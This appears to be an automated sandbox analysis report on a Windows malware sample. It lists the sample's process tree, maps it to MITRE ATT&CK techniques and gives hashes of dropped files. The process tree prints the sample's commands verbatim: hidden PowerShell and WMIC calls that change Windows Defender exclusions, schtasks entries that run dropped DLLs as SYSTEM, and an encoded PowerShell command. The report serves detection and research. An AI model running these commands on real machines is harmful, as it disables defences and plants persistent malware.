- Suspicious use of AdjustPrivilegeToken
PID:1320
-
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵PID:2252
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵PID:1256
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2068 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1152
-
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\VcCVDDBRU\DyLUGV.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "RShenKKeUbJzTjI" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:2836
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "RShenKKeUbJzTjI2" /F /xml "C:\Program Files (x86)\VcCVDDBRU\VVBajwS.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2708
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "RShenKKeUbJzTjI"3⤵PID:2540
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "RShenKKeUbJzTjI"3⤵PID:3048
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YyXYwmYoaLUdkV" /F /xml "C:\Program Files (x86)\ATiuMetuMWHU2\SunBWXR.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2520
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "sCSWtvWCwRQeU2" /F /xml "C:\ProgramData\NonltQQlyMoZtVVB\GmNvriU.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "iHEexGxGyKiKPpGUc2" /F /xml "C:\Program Files (x86)\DcwzooFfPwZYrvRkwnR\jaKjrah.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2200
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bvITFfrvNmRFeACLPQX2" /F /xml "C:\Program Files (x86)\UyPATDbiwjgOC\blIehCe.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
PID:2872
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ROHimGgVjIIdgMKwK" /SC once /ST 02:47:44 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll\",#1 /iwHldidQ 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:1412
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ROHimGgVjIIdgMKwK"3⤵PID:2460
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "nsbPTSdSgPuDRRbhc"3⤵PID:1276
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2228 -s 15363⤵
- Loads dropped DLL
- Program crash
PID:1284
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll",#1 /iwHldidQ 5254032⤵PID:2712
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\ruCXiJvmKkuTmmIt\egkUxadr\IUCPZNk.dll",#1 /iwHldidQ 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:2340 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ROHimGgVjIIdgMKwK"4⤵PID:1624
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {57A757E9-C2D2-42BC-9335-F5146DE774D4} S-1-5-21-268080393-3149932598-1824759070-1000:UHRQKJCP\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
PID:340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:2884
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:568
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2084 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:3028
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:776
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:2476
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:3036
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD50abdce889e4d20dc2ec062838b849326
SHA1627420585632b70e3062c5efe52845483973788d
SHA25622af5c562fcd1b6f070f19aa8c2c890c5321c165ffa6f39038f62e7045de60b2
SHA5120081340aa813c8f9c210f2a43793e316de22b6868eded6c96bce4e5998436ebff32bb4f072196c64c152f1e0eb04108ce68283c002ea41f08d2bedc5ff025c37
-
Filesize
2KB
MD5db3ea1bef9bdf5fa17587832274a5aa3
SHA19712d08d1c0d120da8e7a583bc53fbde412a0d46
SHA256cd00f0dbce81f7ee024aa17b1198906bb1818947941e39622a1e5065163ebb04
SHA512a10a3468e53e14082417f1f3b607832eded13a2538d1d0d99f762d7ca8afea6ebc2e2a97fe8c90dd1a5953a29711f113a5d5326cb5f97c47b266a6909a116ade
-
Filesize
2KB
MD521b988d87005716f950aada8e142743b
SHA10630d8455c29212e9eb6a8270b811c58b164992b
SHA256dc10913c98ec438078429724d083c8bbb640bf365e536a79f70df06b4b194e35
SHA5128a79c432a50eaf066192fdd868c0ac905a6b292ed0656578aa55e635701bad8dc9a7f327022dc38acf75eaec2f54072c9b4ddc9e618e26bc6ea716374003a43c
-
Filesize
2KB
MD5ca5870627c8ac2a31999e5d3d21c6e9c
SHA1be8e4d372aa799bb97860f0727ace2b917bd235b
SHA2560f79aa91390c23cd38f37e0e5f3e771390f5945150956a5f6c682932d5bc18e4
SHA512648bb92c8f7c64b913d605b7be694a692da986506e2443d802f87b21db137d32022e94b570fb214dce9a6080007cda09004e149ec8854c41257a884844d65e34
-
Filesize
2.5MB
MD5cff2a118ae58b6272880322427a92043
SHA12ea08871d3d33dea6576d4d8b739e9c66476f863
SHA256cca2aeb82028af42ce7f69ea23ba4672b0e666649f9b7686d24664b2a84572db
SHA5124e1eb143a00b20ab0f4681f86aed9a06488ced7978c4c04f7cfd66d16bb6095ac91e75d2d4507a798ac868d149430e7e05e29174b483dcd64e3b1ad16b81fba3
-
Filesize
2KB
MD5c652f6911ecea4a6fa09c8cff83107ce
SHA14c5d5bbda97206f7e8284126a705b65b08971e85
SHA2564e0dab0f2aebf7a419b97aef499634e95762ff1c53f80554e8d6e10228cbdea6
SHA512c3218558c83b68fd27cd5c386d15dba7df7cefe7f28aa958762733edf052ff5b053663d493aba34c0c9e69953018cc8249c68a211de56c2c2050ab15dea9cf2b
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
Filesize187B
MD52a1e12a4811892d95962998e184399d8
SHA155b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA25632b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
Filesize136B
MD5238d2612f510ea51d0d3eaa09e7136b1
SHA10953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA5122630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
Filesize150B
MD50b1cf3deab325f8987f2ee31c6afc8ea
SHA16a51537cef82143d3d768759b21598542d683904
SHA2560ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA5125bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f
-
Filesize
10KB
MD53c25f81af3a971661c5e20851a3f6c8a
SHA14735e47e75f1c7cc4309c59fd78abfc45e23abf2
SHA2564d229c67cfafb0316584d3a22933c988b13e340887839e15eeca75aea292f8c1
SHA51223c3181de1890033d5b5b8128a87450bc62a35b030b79c284ae1e27b91ff1321af6f5f00953eca0be8fc93a0926b1ca4525bcc14ab22a7b1bb29f80fccfffa87
-
Filesize
28KB
MD5e890d9722e37c0284971b69556ba6ff3
SHA12b374b0c585c04441838077bcbbe66c2038b83ea
SHA2566cbbe29bfcb423b1886f2e967f3dbb8ce047a415b8c19d860601408a47ecb271
SHA5120fb29917510965f3ce12e8bc555e159fcf3fc29e54c46453a62fabb78fcf5400ec37f0ef8b3fd9b5f4dbeaadad64e4e74394686792f6861275a9d67c910cb982
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5af3e9e55ef058c4ea10470108ca3ecf2
SHA16bf3a5c2e30a5a44bb0b0ba63fdb364f39de5c5f
SHA2561682981e3802639904a65ecfda7afdd5b0d03df710a0b0757dd5837e7af01a3a
SHA51236d3a0b31eb95f4c1c1e30685d3480a3ace294a32e13cb974dba648c33882375e748fc981b88f811e0cc4b8a13ea7e0715e3b0addaf6acdd2fcbbdfcd2f513a3
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\AUR7PZE5OV4Y40Q24ESN.temp
Filesize7KB
MD52a8076bd83052e74de670b46976a33fd
SHA1d290df5dd722ed433b460131f0c661e97dcc36eb
SHA256cbc6c484d5a561182706d5f72d46e5dc6105be0f36019f8f5948e6039b28e1a4
SHA51248b62cd8fb6cb427e5209737b36cfaa932d5c038af86e4a6a1ae9a84d36f5f9935d258a38682d6eae0ecb6cf0efa51db2e1f48082909bf06cd6be87e2d068a04
-
Filesize
7KB
MD5303effdd12a66e953e48b0fbd5bb66e4
SHA1884eafb376da21fd81c41f6efbbdfeed88932b2b
SHA2566cda32c18ca8c7b0919199ba58b983be72afdacbc5c572842e30eaf072ccdba7
SHA5128b2ddc81272efa63e206bb9f74d3132a2815484149e1e92cf9e024a3d9aee8e5bf4522d59389a5701be6f1d505e661f77dce35aab67a13835f44c32ad3beef5c
-
Filesize
6.4MB
MD5d2aff308118773da5201fe22031e0a1a
SHA141e73df772d0803b968330cd41667c3853beca32
SHA2562ac07503ca0f99cd53512eacaaf57aeb4372757d489df640c54af28d0ed5e8a1
SHA51278a5b56996835e928410545ea6e12f0127fbdf638b6c8ae8ac95303eb7a0253d107a344e9492b36b86bc0ec62216676628661ba3c0c711804e6ee675a4b45b23
-
Filesize
9KB
MD59f2b93f709a304da290f634e1cc13a58
SHA1420a0a37964df8be66b41660ad0d922d7747bdba
SHA256c56f368489eefdaed2f8fa5b60a1f82df1fb24110c59b61386b54a8dfd810456
SHA5127b29ff5fffe00e263ab7590f0ca60fc5cd4256debf7b763c0a2f2d95cc6e347634bf89ef2493084a0928bc29e39fa70d3ac85e743982cf8e4dcbf019c96169c5
-
Filesize
6KB
MD5968286be198ff595f13097db81ab33be
SHA1ca9002773f6baf6c7fd573531fbc7e86258c9efe
SHA256eeda5df56623ebdce4399f804708962d1c643c0960571345ca800bf47fff6d58
SHA51238bbb71b678fa210ce2faa469a4d88e1da754e80268c89e7f651d267a501818d76ebd7b53d4ea51fc2427bac4c365a2aa85cc57f19364af7ca4f0feb67f1705d
-
Filesize
6.4MB
MD5b94384dd6eb727fb15aa4802080d08ab
SHA11350c986b8cbd6324ade78481b8739b7542077fd
SHA2568f90b08df89ca8574d4247febc0e9a65e016f643fcb8d001e9e69352e9d6023c
SHA512fedee0d62c9ae94fce4e19814d027beae0be25116eaa0d51c7e6210dcac25bedb1de66456d8bb50add7ec1a318eb075caf921e48d9525da27877c6634c24e2e5
-
Filesize
6.7MB
MD584da5fc2f43e551848349f0d0d3faca4
SHA1cf0078c71fb1ef9743451b6a20d9aa0306e697db
SHA2561989cb898e0e397b9acc16c453c94cf3f1873573979d36873182b18b8da86938
SHA5129a605654c70dc27ae52760b2ced4aa3eedda6e98919ef96d9615c754f07e12c1748f6f978ffc916cb693e7788b21dc101a2442e3251f9a598aa223d9ead238bd